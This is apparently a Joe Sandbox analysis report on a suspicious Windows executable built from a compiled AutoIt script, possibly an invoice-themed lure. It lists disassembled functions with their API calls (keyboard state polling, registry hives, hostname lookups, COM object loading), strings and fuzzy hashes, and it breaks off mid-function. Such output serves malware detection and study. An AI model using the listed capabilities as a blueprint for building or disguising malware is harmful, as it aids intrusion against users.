                                          • Instruction ID: fa255eb1e254b7078ddce2aff7a57e25a2815eef2e9ad68543eb1fd8015ad7f7
                                          • Opcode Fuzzy Hash: 13d37f116ebbc59926453f60f060bab0fe1221838943485468cfdf6814f67c26
                                          • Instruction Fuzzy Hash: 14516A75904209EFCB14CFA9DC84EAEBBB9FF48750F14842EF999A7210D731A844CB60
                                          Function 00DF6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E10B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00DF6C6C,?,00008000), ref: 00E10BB7
                                            • Part of subcall function 00DF48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DF48A1,?,?,00DF37C0,?), ref: 00DF48CE
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DF6D0D
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DF6E5A
                                            • Part of subcall function 00DF59CD: _wcscpy.LIBCMT ref: 00DF5A05
                                            • Part of subcall function 00E1387D: _iswctype.LIBCMT ref: 00E13885
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                          • API String ID: 537147316-1018226102
                                          • Opcode ID: 9a3792a5db07853a96c06beac084c836040ecd120c50c664a36c7d4d194bc048
                                          • Instruction ID: ec60e86c3b97d451388d72c1e0635f4b1091037b395c15cc05b05b23ada057b5
                                          • Opcode Fuzzy Hash: 9a3792a5db07853a96c06beac084c836040ecd120c50c664a36c7d4d194bc048
                                          • Instruction Fuzzy Hash: CC029D311083559FC724EF24D881AAFBBE5FF89314F04891DF696A72A1DB30D949CB62
                                          Function 00DF45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00DF45F9
                                          • GetMenuItemCount.USER32(00EB6890), ref: 00E2D7CD
                                          • GetMenuItemCount.USER32(00EB6890), ref: 00E2D87D
                                          • GetCursorPos.USER32(?), ref: 00E2D8C1
                                          • SetForegroundWindow.USER32(00000000), ref: 00E2D8CA
                                          • TrackPopupMenuEx.USER32(00EB6890,00000000,?,00000000,00000000,00000000), ref: 00E2D8DD
                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E2D8E9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                          • String ID:
                                          • API String ID: 2751501086-0
                                          • Opcode ID: dd5f9a9ae7c1c0706398002ed3a9c6ffd8733a19b8534f0029e37af199b971bd
                                          • Instruction ID: 07c228a327b004197b736e211fb4c07158b1b60fdfe13521ec28d9c98520e54d
                                          • Opcode Fuzzy Hash: dd5f9a9ae7c1c0706398002ed3a9c6ffd8733a19b8534f0029e37af199b971bd
                                          • Instruction Fuzzy Hash: BA71E370604219BEFB248F55EC85FAABF64FF05368F204216FA18B61E0C7B59C54DBA0
                                          Function 00E68BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00E68BEC
                                          • CoInitialize.OLE32(00000000), ref: 00E68C19
                                          • CoUninitialize.OLE32 ref: 00E68C23
                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00E68D23
                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E68E50
                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00E82C0C), ref: 00E68E84
                                          • CoGetObject.OLE32(?,00000000,00E82C0C,?), ref: 00E68EA7
                                          • SetErrorMode.KERNEL32(00000000), ref: 00E68EBA
                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E68F3A
                                          • VariantClear.OLEAUT32(?), ref: 00E68F4A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                          • String ID: ,,
                                          • API String ID: 2395222682-1556401989
                                          • Opcode ID: 97f02df0a5990531f232a1755317074620393fb508cd679a705dcd7f4d4745af
                                          • Instruction ID: 7266c59737549534fd34fb724e05810ad86773eaa75cce20dd4d2ddd37098347
                                          • Opcode Fuzzy Hash: 97f02df0a5990531f232a1755317074620393fb508cd679a705dcd7f4d4745af
                                          • Instruction Fuzzy Hash: C7C15671608305AFC704DF64D98492BB7E9FF88388F005A2DF589AB251DB71ED05CB62
                                          Function 00E710A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E70038,?,?), ref: 00E710BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                          • API String ID: 3964851224-909552448
                                          • Opcode ID: 71f2eeb63c7ec22a4f884d464669229796e07579491236d748514bad90da71e3
                                          • Instruction ID: d4beb338f80459c7c53e2c7021c9208285e5ef4c488d884220804a435f44e2fe
                                          • Opcode Fuzzy Hash: 71f2eeb63c7ec22a4f884d464669229796e07579491236d748514bad90da71e3
                                          • Instruction Fuzzy Hash: 4D41913010138E8BCF10EF94E892AEA3764FF56304F41A494FD957B252DB70AD9ACB60
                                          Function 00E55569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                            • Part of subcall function 00DF7A84: _memmove.LIBCMT ref: 00DF7B0D
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E555D2
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E555E8
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E555F9
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E5560B
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E5561C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: SendString$_memmove
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          • API String ID: 2279737902-1007645807
                                          • Opcode ID: cd30583b90116152769e3c536154ebe0189b4296c00c9f18d550584a012b3615
                                          • Instruction ID: 7d43520915392aa38c925113316a6fc0c6cf68d6191d1ea827e4b52f777fe550
                                          • Opcode Fuzzy Hash: cd30583b90116152769e3c536154ebe0189b4296c00c9f18d550584a012b3615
                                          • Instruction Fuzzy Hash: 8B11D02156026D79DB20B661CC5ACFF7B7CEF96B00F44546AB901B60C1EBA02D08C5B1
                                          Function 00E548F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                          • String ID: 0.0.0.0
                                          • API String ID: 208665112-3771769585
                                          • Opcode ID: d4d3f8a89a7f1b16d989e7328fe37d150ee0c60f1d5b73addd5875fe459f0e45
                                          • Instruction ID: e7357ea9784500826692dc546932bfddf5e7fa4f6207e05a2f5239a73ed62fab
                                          • Opcode Fuzzy Hash: d4d3f8a89a7f1b16d989e7328fe37d150ee0c60f1d5b73addd5875fe459f0e45
                                          • Instruction Fuzzy Hash: 4A110572904115AFCB24EB20DC06EDB77ECAF44715F0411BAF948B6091EF709AC98751
                                          Function 00E55217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • timeGetTime.WINMM ref: 00E5521C
                                            • Part of subcall function 00E10719: timeGetTime.WINMM(?,75C0B400,00E00FF9), ref: 00E1071D
                                          • Sleep.KERNEL32(0000000A), ref: 00E55248
                                          • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00E5526C
                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E5528E
                                          • SetActiveWindow.USER32 ref: 00E552AD
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E552BB
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E552DA
                                          • Sleep.KERNEL32(000000FA), ref: 00E552E5
                                          • IsWindow.USER32 ref: 00E552F1
                                          • EndDialog.USER32(00000000), ref: 00E55302
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                          • String ID: BUTTON
                                          • API String ID: 1194449130-3405671355
                                          • Opcode ID: 9eac3ff63fa202801b36b1a591650e06b84bbd1f21f1788ed2354ec3f8c8491c
                                          • Instruction ID: 370d5114838f5642d4e8d0473f8b16d0b65536f742487cd0d164509b783cd11f
                                          • Opcode Fuzzy Hash: 9eac3ff63fa202801b36b1a591650e06b84bbd1f21f1788ed2354ec3f8c8491c
                                          • Instruction Fuzzy Hash: 7D21A471105704AFE7109B72ED99A263B6AFB45387F042938F809B15B1DB61AC8CCB61
                                          Function 00E5D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                          • CoInitialize.OLE32(00000000), ref: 00E5D855
                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E5D8E8
                                          • SHGetDesktopFolder.SHELL32(?), ref: 00E5D8FC
                                          • CoCreateInstance.OLE32(00E82D7C,00000000,00000001,00EAA89C,?), ref: 00E5D948
                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E5D9B7
                                          • CoTaskMemFree.OLE32(?,?), ref: 00E5DA0F
                                          • _memset.LIBCMT ref: 00E5DA4C
                                          • SHBrowseForFolderW.SHELL32(?), ref: 00E5DA88
                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E5DAAB
                                          • CoTaskMemFree.OLE32(00000000), ref: 00E5DAB2
                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00E5DAE9
                                          • CoUninitialize.OLE32(00000001,00000000), ref: 00E5DAEB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                          • String ID:
                                          • API String ID: 1246142700-0
                                          • Opcode ID: 9b11a6a32bf4588bdf1e4fc98833442e3d8ec3b6d6d23bdb45411dbf4348f192
                                          • Instruction ID: 5b539bffc3fef0fd59debd10bc281e753f01c80866b167a86c9c4a5eeda497c2
                                          • Opcode Fuzzy Hash: 9b11a6a32bf4588bdf1e4fc98833442e3d8ec3b6d6d23bdb45411dbf4348f192
                                          • Instruction Fuzzy Hash: B4B1FA75A00109AFDB14DFA4CC88EAEBBF9EF48305B148469F909EB251DB30ED45CB60
                                          Function 00E5052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00E505A7
                                          • SetKeyboardState.USER32(?), ref: 00E50612
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00E50632
                                          • GetKeyState.USER32(000000A0), ref: 00E50649
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00E50678
                                          • GetKeyState.USER32(000000A1), ref: 00E50689
                                          • GetAsyncKeyState.USER32(00000011), ref: 00E506B5
                                          • GetKeyState.USER32(00000011), ref: 00E506C3
                                          • GetAsyncKeyState.USER32(00000012), ref: 00E506EC
                                          • GetKeyState.USER32(00000012), ref: 00E506FA
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00E50723
                                          • GetKeyState.USER32(0000005B), ref: 00E50731
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: cf3c51744b8d1c2f388f596ac0736f8a45cc0bc438cd2ee15f9f8d36c34c40d8
                                          • Instruction ID: 697f3994cbed54386f33131403c440bb3e3df6705cdf79f70d8754017bf85483
                                          • Opcode Fuzzy Hash: cf3c51744b8d1c2f388f596ac0736f8a45cc0bc438cd2ee15f9f8d36c34c40d8
                                          • Instruction Fuzzy Hash: 6C51DC20A047841AFB35EBB085547EABFF49F01385F085DDAEDC2765C2EA949B4CCB51
                                          Function 00E4C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,00000001), ref: 00E4C746
                                          • GetWindowRect.USER32(00000000,?), ref: 00E4C758
                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E4C7B6
                                          • GetDlgItem.USER32(?,00000002), ref: 00E4C7C1
                                          • GetWindowRect.USER32(00000000,?), ref: 00E4C7D3
                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E4C827
                                          • GetDlgItem.USER32(?,000003E9), ref: 00E4C835
                                          • GetWindowRect.USER32(00000000,?), ref: 00E4C846
                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E4C889
                                          • GetDlgItem.USER32(?,000003EA), ref: 00E4C897
                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E4C8B4
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00E4C8C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$ItemMoveRect$Invalidate
                                          • String ID:
                                          • API String ID: 3096461208-0
                                          • Opcode ID: c2d26cfe498b667ac1979a8118de06e163ae43f5b6cd310d50f95b60581fa308
                                          • Instruction ID: 1d1b25cbb04497a7ad08e2a1beee91e63e3aaf7d32ea22248e0a9061a5ae62d8
                                          • Opcode Fuzzy Hash: c2d26cfe498b667ac1979a8118de06e163ae43f5b6cd310d50f95b60581fa308
                                          • Instruction Fuzzy Hash: 54513071B00205AFDB18CFA9DD89AAEBBB6FB88711F14812DF519E7290D770AD448B50
                                          Function 00DF201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DF2036,?,00000000,?,?,?,?,00DF16CB,00000000,?), ref: 00DF1B9A
                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00DF20D3
                                          • KillTimer.USER32(-00000001,?,?,?,?,00DF16CB,00000000,?,?,00DF1AE2,?,?), ref: 00DF216E
                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00E2BEF6
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DF16CB,00000000,?,?,00DF1AE2,?,?), ref: 00E2BF27
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DF16CB,00000000,?,?,00DF1AE2,?,?), ref: 00E2BF3E
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DF16CB,00000000,?,?,00DF1AE2,?,?), ref: 00E2BF5A
                                          • DeleteObject.GDI32(00000000), ref: 00E2BF6C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID:
                                          • API String ID: 641708696-0
                                          • Opcode ID: e49ce540b0875d5d68bec05dde401e5f08c82fbca3a466c8b99e22720084401d
                                          • Instruction ID: 03454eb629354602145cfda77466189a8b69951c139df909b3701bf71878a39f
                                          • Opcode Fuzzy Hash: e49ce540b0875d5d68bec05dde401e5f08c82fbca3a466c8b99e22720084401d
                                          • Instruction Fuzzy Hash: 6761AC32200724DFDB29DF15DD48B3AB7F1FF44306F158529E286AA660CB75A884CFA0
                                          Function 00DF21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DF25EC
                                          • GetSysColor.USER32(0000000F), ref: 00DF21D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID:
                                          • API String ID: 259745315-0
                                          • Opcode ID: 442f6c75935539736a6c4d5fcafc5687dd350e753121a6239492e09974288d8f
                                          • Instruction ID: 4b330ad36cc66b35fc28ba449c8ae1cf808c96be01caa2702dadb5f6ca7ec426
                                          • Opcode Fuzzy Hash: 442f6c75935539736a6c4d5fcafc5687dd350e753121a6239492e09974288d8f
                                          • Instruction Fuzzy Hash: F841C231001154AFDB259F28EC88BB93B75EB06335F698265FE659A1E2C7318C82DB35
                                          Function 00E5AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,00E7F910), ref: 00E5AB76
                                          • GetDriveTypeW.KERNEL32(00000061,00EAA620,00000061), ref: 00E5AC40
                                          • _wcscpy.LIBCMT ref: 00E5AC6A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BuffCharDriveLowerType_wcscpy
                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                          • API String ID: 2820617543-1000479233
                                          • Opcode ID: 23ed39e3ae14ad4ef26461a201359a73349a9c1b6ef21f8291334d5850663ffa
                                          • Instruction ID: 31e6b2100cfb3224590bd971b130f8cc042c32b954d63fce150263f10db15889
                                          • Opcode Fuzzy Hash: 23ed39e3ae14ad4ef26461a201359a73349a9c1b6ef21f8291334d5850663ffa
                                          • Instruction Fuzzy Hash: F651C3305043059BC710EF14D891AAEB7E5FF84305F19AD2DF9866B2A2DB31AD49CB63
                                          Function 00E7C27C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                            • Part of subcall function 00DF2344: GetCursorPos.USER32(?), ref: 00DF2357
                                            • Part of subcall function 00DF2344: ScreenToClient.USER32(00EB67B0,?), ref: 00DF2374
                                            • Part of subcall function 00DF2344: GetAsyncKeyState.USER32(00000001), ref: 00DF2399
                                            • Part of subcall function 00DF2344: GetAsyncKeyState.USER32(00000002), ref: 00DF23A7
                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00E7C2E4
